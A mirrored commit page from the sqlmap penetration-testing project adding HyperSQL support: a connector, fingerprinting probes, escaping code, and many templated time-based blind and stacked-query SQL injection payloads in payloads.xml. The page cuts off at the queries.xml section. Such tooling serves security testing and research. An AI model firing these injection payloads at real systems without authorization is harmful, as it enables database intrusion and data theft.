sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-25 02:53:46 +03:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #475 from Meatballs1/hsql_clean

Browse Source 
HSQL Payloads and Query Support
This commit is contained in:
Miroslav Stampar 2013-07-01 02:38:04 -07:00
commit aeb83ba651
17 changed files with 764 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
lib/controller/handler.py
View File

@ -20,6 +20,7 @@ from lib.core.settings import FIREBIRD_ALIASES
from lib.core.settings import MAXDB_ALIASES
from lib.core.settings import SYBASE_ALIASES
from lib.core.settings import DB2_ALIASES
from lib.core.settings import HSQL_ALIASES
from lib.utils.sqlalchemy import SQLAlchemy
from plugins.dbms.mssqlserver import MSSQLServerMap
@ -42,6 +43,8 @@ from plugins.dbms.sybase import SybaseMap
from plugins.dbms.sybase.connector import Connector as SybaseConn
from plugins.dbms.db2 import DB2Map
from plugins.dbms.db2.connector import Connector as DB2Conn
from plugins.dbms.hsql import HSQLMap
from plugins.dbms.hsql.connector import Connector as HSQLConn
def setHandler():
"""
@ -60,6 +63,7 @@ def setHandler():
(DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, MaxDBConn),
(DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn),
(DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn),
(DBMS.HSQL, HSQL_ALIASES, HSQLMap, HSQLConn),
]
_ = max(_ if (Backend.getIdentifiedDbms() or "").lower() in _[1] else None for _ in items)

2
lib/core/agent.py
View File

@ -525,7 +525,7 @@ class Agent(object):
else:
return query
if Backend.isDbms(DBMS.MYSQL):
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.HSQL):
if fieldsExists:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT('%s'," % kb.chars.start, 1)
concatenatedQuery += ",'%s')" % kb.chars.stop

6
lib/core/common.py
View File

@ -3448,7 +3448,11 @@ def decodeHexValue(value):
retVal = retVal.decode("utf-16-le")
except UnicodeDecodeError:
pass
elif Backend.isDbms(DBMS.HSQL):
try:
retVal = retVal.decode("utf-16-be")
except UnicodeDecodeError:
pass
if not isinstance(retVal, unicode):
retVal = getUnicode(retVal, "utf8")

7
lib/core/dicts.py
View File

@ -20,6 +20,7 @@ from lib.core.settings import FIREBIRD_ALIASES
from lib.core.settings import MAXDB_ALIASES
from lib.core.settings import SYBASE_ALIASES
from lib.core.settings import DB2_ALIASES
from lib.core.settings import HSQL_ALIASES
FIREBIRD_TYPES = {
"261": "BLOB",
@ -137,6 +138,7 @@ DBMS_DICT = {
DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"),
DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "sybase"),
DBMS.DB2: (DB2_ALIASES, "python ibm-db", "http://code.google.com/p/ibm-db/", "ibm_db_sa"),
DBMS.HSQL: (HSQL_ALIASES, "python jaydebeapi", "https://pypi.python.org/pypi/JayDeBeApi/", "hsql"),
}
FROM_DUMMY_TABLE = {
@ -145,6 +147,7 @@ FROM_DUMMY_TABLE = {
DBMS.FIREBIRD: " FROM RDB$DATABASE",
DBMS.MAXDB: " FROM VERSIONS",
DBMS.DB2: " FROM SYSIBM.SYSDUMMY1",
DBMS.HSQL: " FROM INFORMATION_SCHEMA.SYSTEM_USERS"
}
SQL_STATEMENTS = {
@ -186,7 +189,9 @@ SQL_STATEMENTS = {
"SQL data execution": (
"exec ",
"execute ", ),
"execute ",
"values ",
"call ", ),
"SQL transaction": (
"start transaction ",

2
lib/core/enums.py
View File

@ -33,6 +33,7 @@ class DBMS:
PGSQL = "PostgreSQL"
SQLITE = "SQLite"
SYBASE = "Sybase"
HSQL = "HyperSQL"
class DBMS_DIRECTORY_NAME:
ACCESS = "access"
@ -45,6 +46,7 @@ class DBMS_DIRECTORY_NAME:
PGSQL = "postgresql"
SQLITE = "sqlite"
SYBASE = "sybase"
HSQL = "hsql"
class CUSTOM_LOGGING:
PAYLOAD = 9

4
lib/core/settings.py
View File

@ -163,6 +163,7 @@ MAXDB_SYSTEM_DBS = ("SYSINFO", "DOMAIN")
SYBASE_SYSTEM_DBS = ("master", "model", "sybsystemdb", "sybsystemprocs")
DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS",\
"SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS")
HSQL_SYSTEM_DBS = ("INFORMATION_SCHEMA", "SYSTEM_LOB")
MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms")
MYSQL_ALIASES = ("mysql", "my")
@ -174,10 +175,11 @@ FIREBIRD_ALIASES = ("firebird", "mozilla firebird", "interbase", "ibase", "fb")
MAXDB_ALIASES = ("maxdb", "sap maxdb", "sap db")
SYBASE_ALIASES = ("sybase", "sybase sql server")
DB2_ALIASES = ("db2", "ibm db2", "ibmdb2")
HSQL_ALIASES = ("hsql", "hsqldb", "hs", "hypersql")
DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_"))
SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES
SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQL_ALIASES
SUPPORTED_OS = ("linux", "windows")
USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")

39
plugins/dbms/hsql/__init__.py Normal file
View File

@ -0,0 +1,39 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.enums import DBMS
from lib.core.settings import HSQL_SYSTEM_DBS
from lib.core.unescaper import unescaper
from plugins.dbms.hsql.enumeration import Enumeration
from plugins.dbms.hsql.filesystem import Filesystem
from plugins.dbms.hsql.fingerprint import Fingerprint
from plugins.dbms.hsql.syntax import Syntax
from plugins.dbms.hsql.takeover import Takeover
from plugins.generic.misc import Miscellaneous
class HSQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
"""
This class defines MySQL methods
"""
def __init__(self):
self.excludeDbsList = HSQL_SYSTEM_DBS
self.sysUdfs = {
# UDF name: UDF return data-type
"sys_exec": { "return": "int" },
"sys_eval": { "return": "string" },
"sys_bineval": { "return": "int" }
}
Syntax.__init__(self)
Fingerprint.__init__(self)
Enumeration.__init__(self)
Filesystem.__init__(self)
Miscellaneous.__init__(self)
Takeover.__init__(self)
unescaper[DBMS.HSQL] = Syntax.escape

91
plugins/dbms/hsql/connector.py Normal file
View File

@ -0,0 +1,91 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
try:
from thirdparty import jaydebeapi
import jpype
except ImportError, msg:
pass
import logging
from lib.core.data import conf
from lib.core.data import logger
from lib.core.exception import SqlmapConnectionException
from plugins.generic.connector import Connector as GenericConnector
class Connector(GenericConnector):
"""
Homepage: http://jpype.sourceforge.net/
User guide: http://jpype.sourceforge.net/doc/user-guide/userguide.html
API: http://code.google.com/p/pymysql/
Debian package: <none>
License: Apache License V2.0
"""
def __init__(self):
GenericConnector.__init__(self)
def connect(self):
self.initConnection()
try:
jar = './thirdparty/hsql/hsqldb.jar'
args='-Djava.class.path=%s' % jar
jvm_path = jpype.getDefaultJVMPath()
jpype.startJVM(jvm_path, args)
except (Exception), msg: #todo fix with specific error
raise SqlmapConnectionException(msg[0])
try:
driver = 'org.hsqldb.jdbc.JDBCDriver'
connection_string = 'jdbc:hsqldb:mem:.' #'jdbc:hsqldb:hsql://%s/%s' % (self.hostname, self.db)
self.connector = jaydebeapi.connect(driver,
connection_string,
str(self.user),
str(self.password))
except (Exception), msg: #todo what kind of error is this?!
raise SqlmapConnectionException(msg[0])
self.initCursor()
self.printConnected()
def fetchall(self):
try:
return self.cursor.fetchall()
except (Exception), msg:
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1])
return None
def execute(self, query):
retVal = False
try:
self.cursor.execute(query)
retVal = True
except (Exception), msg: #todo fix with specific error
logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1])
except Exception, msg: #todo fix with specific error
raise SqlmapConnectionException(msg[1])
self.connector.commit()
return retVal
def select(self, query):
retVal = None
upper_query = query.upper()
if query and not (upper_query.startswith("SELECT ") or upper_query.startswith("VALUES ")):
query = "VALUES %s" % query
if query and upper_query.startswith("SELECT ") and " FROM " not in upper_query:
query = "%s FROM (VALUES(0))" % query
self.cursor.execute(query)
retVal = self.cursor.fetchall()
return retVal

33
plugins/dbms/hsql/enumeration.py Normal file
View File

@ -0,0 +1,33 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from plugins.generic.enumeration import Enumeration as GenericEnumeration
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.common import Backend
from lib.core.common import unArrayizeValue
from lib.request import inject
from lib.parse.banner import bannerParser
class Enumeration(GenericEnumeration):
def __init__(self):
GenericEnumeration.__init__(self)
def getBanner(self):
if not conf.getBanner:
return
if kb.data.banner is None:
infoMsg = "fetching banner"
logger.info(infoMsg)
query = queries[Backend.getIdentifiedDbms()].banner.query
kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=True))
return kb.data.banner

21
plugins/dbms/hsql/filesystem.py Normal file
View File

@ -0,0 +1,21 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem):
def __init__(self):
GenericFilesystem.__init__(self)
def readFile(self, rFile):
errMsg = "Not implemented in HSQL"
raise SqlmapUnsupportedFeatureException(errMsg)
def writeFile(self, wFile, dFile, fileType=None, forceCheck=False):
errMsg = "Not implemented in HSQL"
raise SqlmapUnsupportedFeatureException(errMsg)

146
plugins/dbms/hsql/fingerprint.py Normal file
View File

@ -0,0 +1,146 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import re
from lib.core.common import Backend
from lib.core.common import Format
from lib.core.common import getUnicode
from lib.core.common import unArrayizeValue
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.enums import OS
from lib.core.session import setDbms
from lib.core.settings import HSQL_ALIASES
from lib.core.settings import UNKNOWN_DBMS_VERSION
from lib.request import inject
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
class Fingerprint(GenericFingerprint):
def __init__(self):
GenericFingerprint.__init__(self, DBMS.HSQL)
def getFingerprint(self):
value = ""
wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp and not hasattr(conf, "api"):
value += "%s\n" % wsOsFp
if kb.data.banner:
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp and not hasattr(conf, "api"):
value += "%s\n" % dbmsOsFp
value += "back-end DBMS: "
actVer = Format.getDbms()
if not conf.extensiveFp:
value += actVer
return value
blank = " " * 15
value += "active fingerprint: %s" % actVer
if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None
if re.search("-log$", kb.data.banner):
banVer += ", logging enabled"
banVer = Format.getDbms([banVer] if banVer else None)
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
return value
def checkDbms(self):
"""
References for fingerprint:
DATABASE_VERSION()
version 2.2.6 added two-arg REPLACE functio REPLACE('a','a') compared to REPLACE('a','a','d')
version 2.2.5 added SYSTIMESTAMP function
version 2.2.3 added REGEXPR_SUBSTRING and REGEXPR_SUBSTRING_ARRAY functions
version 2.2.0 added support for ROWNUM() function
version 2.1.0 added MEDIAN aggregate function
version < 2.0.1 added support for datetime ROUND and TRUNC functions
version 2.0.0 added VALUES support
version 1.8.0.4 Added org.hsqldb.Library function, getDatabaseFullProductVersion to return the
full version string, including the 4th digit (e.g 1.8.0.4).
version 1.7.2 CASE statements added and INFORMATION_SCHEMA
"""
if not conf.extensiveFp and (Backend.isDbmsWithin(HSQL_ALIASES) \
or conf.dbms in HSQL_ALIASES) and Backend.getVersion() and \
Backend.getVersion() != UNKNOWN_DBMS_VERSION:
v = Backend.getVersion().replace(">", "")
v = v.replace("=", "")
v = v.replace(" ", "")
Backend.setVersion(v)
setDbms("%s %s" % (DBMS.HSQL, Backend.getVersion()))
if Backend.isVersionGreaterOrEqualThan("1.7.2"):
kb.data.has_information_schema = True
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.HSQL
logger.info(infoMsg)
# TODO This gets mangled in UNION queries because of the dummy table
result = inject.checkBooleanExpression("\"java.lang.Math.sqrt\"(1)=1")
if result:
infoMsg = "confirming %s" % DBMS.HSQL
logger.info(infoMsg)
result = inject.checkBooleanExpression("ROUNDMAGIC(PI())>=3")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.HSQL
logger.warn(warnMsg)
return False
else:
kb.data.has_information_schema = True
Backend.setVersion(">= 1.7.2")
setDbms("%s 1.7.2" % DBMS.HSQL)
if not conf.extensiveFp:
return True
banner = self.getBanner()
if banner:
Backend.setVersion("= %s" % banner)
else:
if inject.checkBooleanExpression("(SELECT [RANDNUM] FROM (VALUES(0)))=[RANDNUM]"):
Backend.setVersionList([">= 2.0.0", "< 2.3.0"])
else:
banner = unArrayizeValue(inject.getValue("\"org.hsqldb.Library.getDatabaseFullProductVersion\"()", safeCharEncode=True))
if banner:
Backend.setVersion("= %s" % banner)
else:
Backend.setVersionList([">= 1.7.2", "< 1.8.0"])
return True
else:
warnMsg = "the back-end DBMS is not %s or is < 1.7.2" % DBMS.HSQL
logger.warn(warnMsg)
return False

26
plugins/dbms/hsql/syntax.py Normal file
View File

@ -0,0 +1,26 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import binascii
from lib.core.convert import utf8encode
from plugins.generic.syntax import Syntax as GenericSyntax
class Syntax(GenericSyntax):
def __init__(self):
GenericSyntax.__init__(self)
@staticmethod
def escape(expression, quote=True):
"""
>>> Syntax.escape("SELECT 'abcdefgh' FROM foobar")
'SELECT CHAR(97)||CHAR(98)||CHAR(99)||CHAR(100)||CHAR(101)||CHAR(102)||CHAR(103)||CHAR(104) FROM foobar'
"""
def escaper(value):
return "||".join("CHAR(%d)" % ord(value[i]) for i in xrange(len(value)))
return Syntax._escape(expression, quote, escaper)

29
plugins/dbms/hsql/takeover.py Normal file
View File

@ -0,0 +1,29 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.takeover import Takeover as GenericTakeover
class Takeover(GenericTakeover):
def __init__(self):
GenericTakeover.__init__(self)
def osCmd(self):
errMsg = "Not implemented in HSQL"
raise SqlmapUnsupportedFeatureException(errMsg)
def osShell(self):
errMsg = "Not implemented in HSQL"
raise SqlmapUnsupportedFeatureException(errMsg)
def osPwn(self):
errMsg = "Not implemented in HSQL"
raise SqlmapUnsupportedFeatureException(errMsg)
def osSmb(self):
errMsg = "Not implemented in HSQL"
raise SqlmapUnsupportedFeatureException(errMsg)

2
plugins/generic/databases.py
View File

@ -510,7 +510,7 @@ class Databases:
infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.info(infoMsg)
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQL):
query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
query += condQuery
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):

2
plugins/generic/entries.py
View File

@ -159,7 +159,7 @@ class Entries:
entries = zip(*[entries[colName] for colName in colList])
else:
query = rootQuery.inband.query % (colString, conf.db, tbl)
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQL):
query = rootQuery.inband.query % (colString, conf.db, tbl, prioritySortColumns(colList)[0])
else:
query = rootQuery.inband.query % (colString, conf.db, tbl)

293
xml/payloads.xml
View File

@ -1127,7 +1127,6 @@ Formats:
</test>
<!-- End of stacked conditional-error blind queries tests -->
<!-- Error-based tests - WHERE or HAVING clause -->
<test>
<title>MySQL &gt;= 5.0 AND error-based - WHERE or HAVING clause</title>
@ -1878,7 +1877,6 @@ Formats:
-->
<!-- End of error-based tests - GROUP BY and ORDER BY clauses -->
<!-- Inline queries tests -->
<test>
<title>MySQL inline queries</title>
@ -1996,7 +1994,6 @@ Formats:
</test>
<!-- End of inline queries tests -->
<!-- Stacked queries tests -->
<test>
<title>MySQL &gt; 5.0.11 stacked queries</title>
@ -2245,6 +2242,48 @@ Formats:
<dbms_version>&gt;= 2.0</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt;= 1.7.2 Server stacked queries</title>
<stype>4</stype>
<level>1</level>
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) END</vector>
<request>
<payload>;CALL REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000)</payload>
<comment>--</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt;= 2.0 Server stacked queries</title>
<stype>4</stype>
<level>1</level>
<risk>0</risk>
<clause>0</clause>
<where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) END</vector>
<request>
<payload>;CALL REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
<comment>--</comment>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 2.0</dbms_version>
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
<!-- End of stacked queries tests -->
@ -2712,6 +2751,88 @@ Formats:
<dbms>IBM DB2</dbms>
</details>
</test>
<test>
<title>HSQL &gt;= 1.7.2 AND time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>AND '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt;= 1.7.2 AND time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>AND '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt; 2.0 AND time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>AND '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt; 2.0 AND time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>AND '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access -->
<!-- End of AND time-based blind tests -->
@ -2931,6 +3052,88 @@ Formats:
<dbms>IBM DB2</dbms>
</details>
</test>
<test>
<title>HSQL &gt;= 1.7.2 OR time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>OR '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt;= 1.7.2 OR time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>OR '[RANDSTR]'=REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt; 2.0 OR time-based blind (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>OR '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt; 2.0 OR time-based blind (heavy query - comment)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END</vector>
<request>
<payload>OR '[RANDSTR]'=REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access -->
<!-- End of OR time-based blind tests -->
@ -3211,7 +3414,7 @@ Formats:
</test>
<test>
<title>IBM DB2 AND time-based blind (heavy query)</title>
<title>IBM DB2 time-based blind - Parameter replace (heavy query)</title>
<stype>5</stype>
<level>5</level>
<risk>2</risk>
@ -3228,6 +3431,47 @@ Formats:
<dbms>IBM DB2</dbms>
</details>
</test>
<!-- Untested -->
<test>
<title>HSQL &gt;= 1.7.2 time-based blind - Parameter replace (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt; 2.0 time-based blind - Parameter replace (heavy query)</title>
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<where>1</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>
<request>
<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<!-- End of time-based blind tests - Parameter replace -->
@ -3389,6 +3633,47 @@ Formats:
<dbms>Oracle</dbms>
</details>
</test>
<test>
<title>HSQL &gt;= 1.7.2 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>2,3</clause>
<where>1</where>
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
<request>
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
<comment>--</comment>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt;= 1.7.2</dbms_version>
</details>
</test>
<test>
<title>HSQL &gt; 2.0 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>2,3</clause>
<where>1</where>
<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</vector>
<request>
<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>HSQL</dbms>
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access -->
<!-- End of time-based blind tests - GROUP BY and ORDER BY clause -->

67
xml/queries.xml
View File

@ -625,4 +625,71 @@
